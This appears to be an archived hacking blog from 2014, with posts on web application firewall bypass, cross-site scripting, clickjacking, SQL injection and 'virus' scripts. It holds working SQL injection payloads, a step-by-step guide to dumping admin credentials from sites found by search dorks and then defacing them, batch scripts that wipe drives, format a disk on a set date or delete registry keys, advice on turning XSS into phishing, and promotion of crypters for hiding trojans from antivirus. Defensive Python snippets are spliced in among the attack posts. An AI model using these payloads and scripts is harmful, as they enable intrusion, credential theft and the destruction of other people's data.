Tuesday, 9 December 2014

Hack Web Application Firewall

Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload. Today we demonstrate some tricks to bypass a web application firewall (WAF).

By Sqli:

http://abc.com/detail.php?id=44 union all select 1,2,3,4,5--

Bypassed Sqli:

http://abc.com/detail.php?id=1 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5--

By Function Capitalization:

Some web application firewalls filter only lowercase keywords, so they can easily be bypassed by changing the case.

Actual query:

http://abc.com/detail.php?id=44 UNION SELECT 1,2,3,4,5--

Query to bypass the WAF:

http://abc.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5--

By Replaced Keywords:

Some WAFs will escape (strip out) certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word inside another copy of itself, as in the query below.

Actual query:

http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5--

Query to bypass the WAF:

http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--
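
Seen from the filter's side, all three tricks above work because the rule inspects the raw string, or rewrites it, instead of blocking on a canonical form. The following is an added example, not code from this post or from any WAF product; the function names are hypothetical, the `id` values are the ones in the URLs above, and the signature covers only those payloads.

```python
import re
from urllib.parse import unquote_plus

KEYWORDS = ("union", "select", "order by")

# Raw values of the id parameter, copied from the URLs in this post.
PLAIN = "44 union all select 1,2,3,4,5--"
COMMENTED = "1 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5--"
MIXED_CASE = "-1 uniOn SeLeCt 1,2,3,4,5--"
NESTED = "-1 UNIunionON SEselectLECT 1,2,3,4,5--"


def weak_lowercase_rule(value):
    """Weak rule: case-sensitive substring match. True means 'blocked'."""
    return any(word in value for word in KEYWORDS)


def weak_strip_once(value):
    """Weak rule: delete keywords in one pass and forward what is left."""
    return re.sub("|".join(KEYWORDS), "", value, flags=re.IGNORECASE)


def normalize(value):
    """Canonicalise a raw parameter value before any rule looks at it."""
    previous = None
    while previous != value:              # undo repeated URL encoding
        previous, value = value, unquote_plus(value)
    # MySQL executes the body of /*! ... */ (optionally /*!50000 ... */), so keep it.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)   # ordinary comments
    return re.sub(r"\s+", " ", value).strip().casefold()


# Signature for the payloads in this post only, matched on the canonical form.
UNION_SELECT = re.compile(r"\bunion\b(?: all| distinct)? select\b")


def hardened_rule(value):
    """Block (never rewrite) when the canonical form contains UNION SELECT."""
    return bool(UNION_SELECT.search(normalize(value)))


def valid_id(value):
    """Positive validation in the application: id is 1 to 10 ASCII digits."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


if __name__ == "__main__":
    for raw in (PLAIN, COMMENTED, MIXED_CASE, NESTED, "44"):
        print(f"{raw!r}: weak={weak_lowercase_rule(raw)} "
              f"hardened={hardened_rule(raw)} valid_id={valid_id(raw)}")
    # The single-pass rewrite turns the nested string into the query it
    # was meant to stop, which is why a rule should reject, not rewrite.
    print("strip-once output:", weak_strip_once(NESTED))
```

The nested string is harmless as long as nothing rewrites it, so `hardened_rule` leaves it alone while `valid_id` rejects it along with every other non-numeric value.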


Friday, 28 November 2014

XSS- Cross Site Scripting

XSS is basically a way to redirect the user to another web page without the user knowing about it.
There are two types of XSS:
* Reflective
* Stored

Reflective XSS:

This is the most common type of XSS. In this case the code is not stored on the server side. Let me show you a demo of this. Let us assume there exists a web page with a search box in it.

http://www.search.com/

Now type anything in the box and look at the URL. If we type "hacking", the URL becomes as follows:

Now in the URL, you can see q=hacking. Also look at the source code of the green box highlighted above. It is as follows:

<input type="text" id="searchbox" value="hacking">

Now suppose this website is vulnerable to XSS. If we make the URL:
http://www.search.com/search?q="><script>alert("hacked")</script>
the HTML code of the box would become as follows:
<input type="text" id="searchbox" value=""><script>alert("hacked")</script>
What has happened is that we have manually closed the input box and written our own script element. So if you give this link to someone, "hacked" would pop up on the screen.
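
The fix for the search box above is to encode the reflected value for the context it lands in, here a double-quoted HTML attribute. This is an added example, not code from the site in this post; the function names are hypothetical and the payload is the `q` value shown above.

```python
import html
from html.parser import HTMLParser

TEMPLATE = '<input type="text" id="searchbox" value="{q}">'
PAYLOAD = '"><script>alert("hacked")</script>'   # the q value from this post


def render_vulnerable(q):
    """Reflects q into the attribute unchanged, as the page in this post does."""
    return TEMPLATE.format(q=q)


def render_encoded(q):
    """Encodes &, <, > and both quote characters before reflecting q.

    This is sufficient only because the attribute value is quoted in the
    template; other contexts (script blocks, URLs) need their own encoding.
    """
    return TEMPLATE.format(q=html.escape(q, quote=True))


class _Collector(HTMLParser):
    """Records what an HTML parser sees: element names and the input's value."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def parse(markup):
    """Return (list of start tags, value attribute of the input element)."""
    collector = _Collector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.input_value


if __name__ == "__main__":
    for render in (render_vulnerable, render_encoded):
        markup = render(PAYLOAD)
        tags, value = parse(markup)
        print(render.__name__, "->", markup)
        print("  elements:", tags, "| value attribute:", repr(value))
```

Parsing the output, rather than searching it for `<script>`, makes this usable as a regression test: the encoded page must contain exactly one element and its value must round-trip to the original input.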

This link is also very good   http://ha.ckers.org/xss.html , once you get the hang of XSS.


Now when you give this link to someone, they will actually go to http://www.yoursite.com, thus fooling the user.
The following is a POC- Proof Of Concept.
http://www.google.com/search?btnI&q=allinurl:http://www.yahoo.com/

In this case it is going to go to http://www.yahoo.com even though the URL starts with http://www.google.com. You can also encode the URL so that the user doesn't see the last part of the URL. You can learn how to do that here: http://pc-help.org/obscure.htm

You can go to http://www.xssed.com and check out the XSS vulnerabilities in all the websites and use it to your advantage.

E.g. you can make a phishing site of Gmail and give the victim a link with http://www.google.com/(link which is vulnerable to XSS) which will redirect the user to your phishing site. The user won't know, as he will mostly see the starting part of the URL, and thus he is fooled. You can't use the above link (given for the POC) for your phishing page. :p Guess why!

Try using some other XSS vulnerability from xssed.com or try finding your own XSS vulnerability on some website.

STORED XSS:

In this type of XSS, the malicious code is stored on the server. E.g. take the case of a guest book which takes user input, stores it in a database and displays it to other users. If the code is "buggy", a hacker can insert JavaScript there so that every time any user opens that page, the script is executed without the user knowing.

Reflective XSS is more common on the internet as the developers are more careful when something is being written to the server database :p

Interesting Information:

XSS is a very dangerous vulnerability. Bank websites take utmost care to see that their code is not vulnerable to XSS, as they are the most targeted. Just imagine if a bank URL redirects to some hacker's phishing page. All the user's details are lost!

The best video tutorial of XSS is here:  http://infinityexists.com/videos/episode13/. You can either watch it online or download it.

The toughest part about XSS is finding a vulnerable piece of code and filter evasion. Many sites have code such that malicious code is filtered out from the user input, so the thrill is in finding a way to evade this filter!


Thursday, 27 November 2014

Clickjacking

A clickjacking attack allows an attacker to perform an action on a victim website; Facebook and Twitter accounts are the most common targets. It happens when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top-level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both. It may be similar to a Cross-Site Request Forgery (CSRF) attack.

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

At present this attack is mostly used on social network websites like Facebook and Twitter, because it relies on convincing the victim to click on a link, and a social network website can be very useful for reaching the victim.

Code:

 <style>
 iframe { /* iframe from facebook.com */
  width:300px;
  height:100px;
  position:absolute;
  top:0; left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>

<div>Click on the link to get more followers:</div>
   
<iframe src="/files/tutorial/window/clicktarget.html"></iframe>

<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be get 10000 followers..!!</div>

Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!


Download:
ClickJacking Tool


For Defence:
Clickjacking Protection


For more information:
OWASP


Thursday, 13 November 2014

Hack Sites Using Havij

Just Follow these easy steps :

1. First download havij from here
http://itsecteam.com/

2. Run Havij SQL Injection software and copy and paste vulnerable website link

3. Now click in the “Analyze” Button

4. It then shows some messages. Watch them and be patient for some time while it finds whether the site is vulnerable, the type of injection and whether the DB server is MySQL; it will then find the database name. The database name looks like xxxx_xxxx

5. Then move to the next operation, finding tables, by clicking "Tables" as shown in the figure. Now click "Get tables", then wait some time if needed

6. After the tables are found, you will see a "users" table. Put a mark on it and click the "Get columns" tab

7. There, just mark username and password and click "Get data"

8. Finally you now have the username and password of the admin…


Tuesday, 11 November 2014

V.I.R.U.S Scripts

IMPORTANT NOTE: This code is for knowledge only. All scripts here are to be copied into Notepad.


This Virus Deletes All The Content Of A Drive...

@echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code a .bat file

Disable Internet Permanently Save As A bat File

echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

The Most Simple Virus To Crush The Window

@Echo off Del C:\ *.* |y Save It As Any.bat

This Will Crash Ur Computer

Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next Save It As Anything.vbs It Only Works With Windows XP

Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:- @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked. Have a nice day. GOTO MESSAGE

Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes* Code:- @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

Bomb Virus

Copy Paste The Following If %date% NEQ 2014/11/20 goto exit format E: /y >nul :exit exit And Save It As Anything.bat Note:- You Can Change The Date ( 2014/11/20 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action The Virus Will Take Effect On That Day

Crazy caps lock

*This constantly turns caps lock on and off really fast continuously* Code:- Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop

Endless Enter

*This constantly makes it so the enter button is being pressed continuesly* Code:- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop

Endless Backspace

*This makes it so the backspace key is constantly being pressed* Code:- MsgBox “Let’s go back a few steps” Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop

Make Your Keyboard Disco Light


This trick just makes your keyboard lights do disco. The script I'm sharing with you, when executed, makes your Caps, Num and Scroll Lock lights flash in a cool rhythmic way!
1. This piece of code makes your keyboard a live disco:
Set wshShell = WScript.CreateObject("WScript.Shell")
Do
    WScript.Sleep 100
    wshShell.SendKeys "{CAPSLOCK}"
    wshShell.SendKeys "{NUMLOCK}"
    wshShell.SendKeys "{SCROLLLOCK}"
Loop
2. This one makes it look like a chain of lights:
Set wshShell = WScript.CreateObject("WScript.Shell")
Do
    WScript.Sleep 200
    wshShell.SendKeys "{CAPSLOCK}"
    WScript.Sleep 100
    wshShell.SendKeys "{NUMLOCK}"
    WScript.Sleep 50
    wshShell.SendKeys "{SCROLLLOCK}"
Loop
Instructions:
* Paste either of the two scripts above into Notepad
* Save as "AnyFileName".vbs
* Run the file
* To stop, launch Task Manager and then under "Processes" end "wscript.exe"


Monday, 10 November 2014

V.I.R.U.S

Vital Information Resource Under Siege

Introduction:

A VIRUS is a small, executable program with the ability to replicate itself, usually without the permission or knowledge of the user. The word "virus" is the generic term for worms, viruses and Trojans. Computer viruses are called "viruses" because they share some common characteristics of biological viruses. Computer viruses, like biological viruses, are task specific. They are designed to infect a designated target. This can be a specific type of file or computer sub-system. A virus must piggyback on top of some other program to get executed. It passes from computer to computer like biological viruses pass from person to person. Fighting computer viruses is like human intelligence fighting against itself. Virus-masters continuously upgrade their techniques to ensure their survival in the computing environment. Computer virologists face the task of combating new viruses that have been developed by members of their own programming fraternity. Once they have found anti-virus software to take care of an existing virus, virus-meisters invent a new string of viruses, which are even more difficult to decipher or crack.

The appearance of computer viruses is one of the most interesting developments in technology in the twentieth century. Computer viruses are mysterious but fascinating at the same time. Every time a new virus hits, it makes the news. On the other hand, they show how sophisticated they have become in terms of technology, and it is precisely our dependence on technology that makes us so vulnerable.

Coming back to viruses: a virus can add its code anywhere in the host program and/or the system area of a hard disk or floppy disk. The host program is nothing but an executable file like .EXE, .COM, etc. Anywhere in the file means that the virus code can get appended at the beginning, at the end, in the middle, or by simply placing a pointer to a different location on disk where the virus can find it. It is coded in such a way that the virus code gets executed first. Also, the code it appends to a file is normally not the complete source code of the virus. It is just the self-replicating part, so that it can attack a larger number of programs.

Difference between a computer virus and other programs

Viruses are designed to self-replicate, usually without the knowledge of the user. They often contain "payloads", actions that the virus carries out separately from replication.

Viruses can be hidden in:
* Programs available on floppy disks or CDs
* E-mail attachments
* Material downloaded from the web

Payload of computer viruses

The payload is the malicious activity that the virus carrying it performs. In short, we can define the payload as the extent of damage a virus is supposed to cause. A payload can be triggered by a number of conditions, like:
* A certain date of the month or year
* Execution of certain programs
* A built-in counter

Examples of what a payload can do:
* Delete files
* Confidential information access and release
* E-mail: unauthorized mass e-mailing
* File modification
* Overwriting security settings
* System instability
* Degrading system performance (steals system cycles)

Virus Behavior:

In general, a virus has two phases, “infection phase” and “attack phase”. The first phase is the infection phase, where the virus reproduces widely and the second is the attack phase, where they do whatever damage they are programmed to do. Its presence can be felt only when they activate themselves.

Infection phase

Virus writers have to balance how and when their virus should infect against the possibility of being detected. Therefore the spread of infection may not be immediate. This is the phase where the virus commences the acquisition of the system by first infecting the identified target, second taking charge of the target and lastly by installing its own command. These steps are coded in detail in the instruction code given to it by the author. No one knows when exactly a virus will infect other programs or, in simple words, when it will activate itself. Some viruses infect each time they are executed, and some viruses will infect upon a trigger. You can never be sure that your system is not infected by a virus after running an AV program a few times. This is because the virus may not have started its infection phase. The virus writer will want his program to spread as far as possible so that in the second phase, "the attack phase", the victim's computer will have a positive impact to the virus. Many viruses go resident in memory. This provides an upper hand for the virus, as it can wait for an external event before it starts the infection, and the trigger used by the virus also becomes hard to guess. A resident virus frequently takes over a portion of the system software to hide its presence. This technique is called stealth.

Attack phase

Not all viruses attack, but all use system resources and often have bugs. Most viruses do unpleasant things like deleting files or changing random data on your disk, slowing down your PC, stealing passwords from the system and mailing them to a remote e-mail address, etc. Viruses often delay revealing their presence by launching their attack only after they have had ample opportunity to spread. This means that the attack phase can start even after months of infection. This attack phase is optional. Many viruses simply reproduce themselves and have no trigger for an attack phase.

Classification of Computer viruses
Viruses can be classified in a number of ways. One way of classifying them is as follows:
* Environment
  * File viruses
    * Overwriting virus
    * Parasitic virus or cavity (space-filler) virus
    * Companion virus
    * File worms
    * Link viruses or cluster viruses
    * Source code viruses (OBJ, LIB viruses)
    * Tunneling viruses
    * Camouflage virus
  * Boot viruses
    * Parity boot
    * Boot-and-file virus
    * System sector virus
  * Macro viruses
  * Network viruses
  * VB worms
* Operating system (OS)
* Different algorithms of work
  * Terminate and stay resident (TSR) virus
  * Stealth algorithm
  * Armored virus
  * Polymorphic or self-encrypting capabilities
  * Logic bombs

work on windows xp


Sunday, 9 November 2014

SQL Strings

Strings List:


admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

Saturday, 8 November 2014

SQL Injection



SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT, DELETE are used to update information in the database.
In this type of attack, we make use of a vulnerability wherein we supply our own commands to the website's database and successfully deface it. This vulnerability occurs when the user's input is not filtered or is improperly filtered.

Step 1: Looking for the Vulnerability
www.something.com/news/news.php?id=130
The above URL can be vulnerable to SQL injection. It takes the ID as 130 and returns some values. To see if the URL is vulnerable, put a ' at the end of the URL. So try this URL:
www.something.com/news/news.php?id=130'
Now if you get an error saying something like it's not a valid MySQL statement, then it is possible to exploit this URL. Example: when I did it on a website vulnerable to this exploit, I got the following
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
One more thing: if the URL ends in .php?catid=x, where x is a number, you can also use the above method to see if the site is vulnerable.
So, now you know if the website is vulnerable or not, but how do you find websites which are vulnerable? Easy! You use a google dork to do this. So you are going to use google to find vulnerable websites. Type the following in google:
1. inurl:.php?id=
2. inurl:.php?catid=
So now you will get a list of websites. Test them one by one with the method mentioned above to see if they are vulnerable.

Step 2: Exploiting the vulnerability
This tutorial is only for educational purposes. Kindly do not misuse it.
You have a vulnerable URL
www.something.com/news/news.php?id=130
OK, now how do you deface it?
Finding number of columns
Now put the following in the URL:
http://www.something.com/news/news.php?id=130 order by 10--
Now we told the database to order by the 10th column. Your job is to find how many columns there are in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply, put 11 and try.
Also, the -- (two dashes) at the end means "comment". So anything after this statement is commented off and only our query is put in.
So assume I got an error for order by 10, then I tried order by 9 and so on. Finally I got no error at 6 and an error at 7. Hence, the table has 6 columns.
Find Vulnerable columns
Now we will use the union all and select commands to find a vulnerable column. Remember to replace that ID number by minus that. Like here, I have made it id=-130.
http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--
Since it has 6 columns, we do select all 1,2,3,4,5,6 and a -- at the end.
This will give an output. Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.
Finding tables
Now our job is to find the different tables in the database. We do the following:
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Here group_concat(table_name) will give you all the table names in the database. information_schema holds information about the database. So we are just querying from that.
Finding Column names
Similarly, get all the columns by simply replacing 'table' with 'column':
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be an "id" and then all the columns from the next table and so on.
If this doesn't work then you can do
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="some table you got from the previous step"--

Final Step
Now in the list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want, e.g. the username and password columns from the tbl_admin table:
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin--
Here I just put the column names in group_concat with 0x3a in between, which is ASCII for colon, and tbl_admin is the table name where these columns are.
Now I got output something like
admin:"encrypted hash",user2:"encrypted hash", and so on…
So usernames are not encrypted here and passwords are encrypted.
So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google dorks :
Defacing
Now you have the admin username and admin password from the previous step. Now you have to find the admin page of the site.
Go to http://tools.th3-0utl4ws.com/admin-finder/ and put in your website there.
It will give you the admin page after some time.
Mine turned out to be http://www.something.com/admin
So here you get a login box. Put in the username and password of the admin and that's it.
Now do whatever you want, like defacing or deleting tables etc…
There is a reason I have not told you what something.com is. You can use the google dorks I mentioned to find any vulnerable site.
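
Every step in this post depends on the cause named at the top: the `id` value is pasted into the SQL text, so the database parses it as part of the query. The following is an added example, not code from the site or the post; it uses an in-memory SQLite table as a constructed stand-in for the site's MySQL database, the function names are hypothetical, and the two probe values are the ones from the URLs above.

```python
import sqlite3

# Values of the id parameter taken from the URLs in this post.
QUOTE_PROBE = "130'"
UNION_PROBE = "-130 union select all 1,2,3,4,5,6--"


def make_db():
    """Constructed stand-in for the site's database: a six-column news table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT,"
               " author TEXT, created TEXT, views INTEGER)")
    db.execute("INSERT INTO news VALUES"
               " (130, 'Site launch', 'Body text', 'editor', '2014-11-08', 7)")
    return db


def news_concatenated(db, news_id):
    """Vulnerable pattern: the parameter becomes part of the SQL text."""
    return db.execute("SELECT * FROM news WHERE id=" + news_id).fetchall()


def news_bound(db, news_id):
    """Fixed pattern: the parameter is bound as a value, never parsed as SQL."""
    return db.execute("SELECT * FROM news WHERE id = ?", (news_id,)).fetchall()


def news_hardened(db, news_id):
    """Allowlist check plus bound parameter; returns (http_status, rows)."""
    if not (news_id.isascii() and news_id.isdigit()):
        return 400, []                      # rejected before reaching the database
    rows = db.execute("SELECT * FROM news WHERE id = ?",
                      (int(news_id),)).fetchall()
    return (200 if rows else 404), rows


def outcome(query_fn, db, news_id):
    """Summarise a lookup as 'error', 'no rows' or the first column of each row."""
    try:
        rows = query_fn(db, news_id)
    except sqlite3.Error:
        return "error"                      # what the visitor sees as a SQL error
    return [row[0] for row in rows] or "no rows"


if __name__ == "__main__":
    db = make_db()
    for value in ("130", QUOTE_PROBE, UNION_PROBE):
        print(f"{value!r:40} concatenated={outcome(news_concatenated, db, value)!r:10}"
              f" bound={outcome(news_bound, db, value)!r:10}"
              f" hardened_status={news_hardened(db, value)[0]}")
```

With the bound parameter the quote no longer produces a syntax error and the UNION text is compared to `id` as an ordinary string, so neither probe tells the sender anything about the table.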

Friday, 7 November 2014

Hacking Tools

Tools

BEWARE OF THESE TOOLS: THEY CAN DAMAGE YOUR DEVICE.

PROXY FINDER

Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online.

ANONYMOUS SURFING : HOTSPOT SHIELD

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application employs the latest VPN technology, and is easy to install and use.

ANONYMOUS SURFING : PC MESH ANONYMOUS WEB SURFING

PC Mesh Anonymous Web Surfing is an internet utility to hide your IP address while you are browsing the web. IP address is your internet identification number which is detectable by any web site that you visit. It is fully automatic. You don't need to have any knowledge of setting up proxy connections. Just click "Autopilot" and watch. PC Mesh Anonymous Web Surfing will check your real IP address, verify a large number of proxy servers with a lightning fast speed, delete the non-functional proxies, sort them by ping, select the fastest proxy, check your IP address again and compare it with your real IP address.

ANONYMOUS SURFING : IP ANONYMIZER

IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.

ANONYMOUS SURFING : GHOSTSURF PLATINUM

The ultimate IP address hider and anonymizer which include the following features: * Encrypts your Internet connection * Erases all traces of your Web surfing * Removes aggressive spyware * Prevents identity theft and credit card fraud * Secures confidential files * Eliminates online ads * Also includes Spycatcher which is an excellent anti-spyware.

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD KRYPTONITE CRYPTER

This is another FUD crypter used to crypt the source code of your keylogger, RAT or botnet etc so that they are not detected by antiviruses. The advantage of using it is that it is almost FUD, only Avira and Sophos Antivirus detected it on NoVirusThanks.

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD t3c4i3 CRYPTER

This Crypter is an easy to use and a fully undetectable (FUD) crypter software used to hide our viruses, RATs or any keylogger from anti-viruses so that they are not detected and deleted by antiviruses. It allows users to crypt the source code of their program and assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus easily bypasses antivirus detection.

BINDER SOFTWARE TO HIDE KEYLOGGERS/TROJANS : SIMPLE BINDER

Simple Binder is a software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application, the application is also run when the actual binded file is run. Password: hackingguide

BINDER SOFTWARE TO HIDE KEYLOGGERS/TROJANS : WEEKEND BINDER

Weekend Binder is another software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application, the application is also run when the actual binded file is run. Password: hackingguide

DARK PORT SCANNER

Dark Port Scanner is a simple port scanner with an easy to use interface which scans for open ports on computers in a network.

ANGRY IP SCANNER

Angry IP scanner is a very fast IP address and port scanner. It can scan IP addresses in any range as well as any of their ports. It is cross-platform and lightweight. Angry IP scanner simply pings each IP address to check if it's alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc. It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc. Scanning results can be saved to CSV, TXT, XML or IP-Port list files.

PACKET SNIFFER : TCP DUMP

Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.

NETWORK SCANNING TOOL : NMAP

Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts.

PACKET SNIFFER : WIRESHARK

Wireshark is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

WIRELESS SNIFFER : KISMET

Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.

WEP/WPA CRACKING TOOL : AIRCRACK

Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

VULNERABILITY ASSESSMENT TOOL : NESSUS

Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

THE ULTIMATE PENETRATION TESTING TOOL : METASPLOIT

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public, tested exploits. The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing.


VULNERABILITY ASSESSMENT TOOL : RETINA

Retina's function is to scan all the hosts on a network and report on any vulnerabilities found.


VULNERABILITY SCANNER : X-SCAN

A multi-threaded, plug-in-supported vulnerability scanner. X-Scan includes many features, including full NASL support, detecting service types, remote OS type/version detection, weak user/password pairs, and more.


WEBSITE HACKING SOFTWARE : ADMIN FINDER

Admin Finder is a tool which scans vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present you the page on which you can log in with the administrator password. Password: hackingguide


WEBSITE HACKING SOFTWARE : EXPLOIT SCANNER

Exploit Scanner is a tool which scans a website to check whether it is vulnerable to attack or not. You just have to enter the URL and it will instantly report whether the website is vulnerable to attack or not. Password: hackingguide


WEBSITE HACKING SOFTWARE : SQLI HELPER

SQLI Helper is a tool that will hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way into a website and trying hundreds of combinations and codes to hack a website. There is also no need for knowledge of SQL to use this software. This tool will do it all by itself. You only have to tell it what to do and where to look. Password: hackingguide



Sunday, 26 October 2014

Firefox About:Config Tricks

You may have installed countless add-ons in Firefox to enhance your browsing experience, but if you want to get the most out of Firefox, you really have to hack your way into about:config.

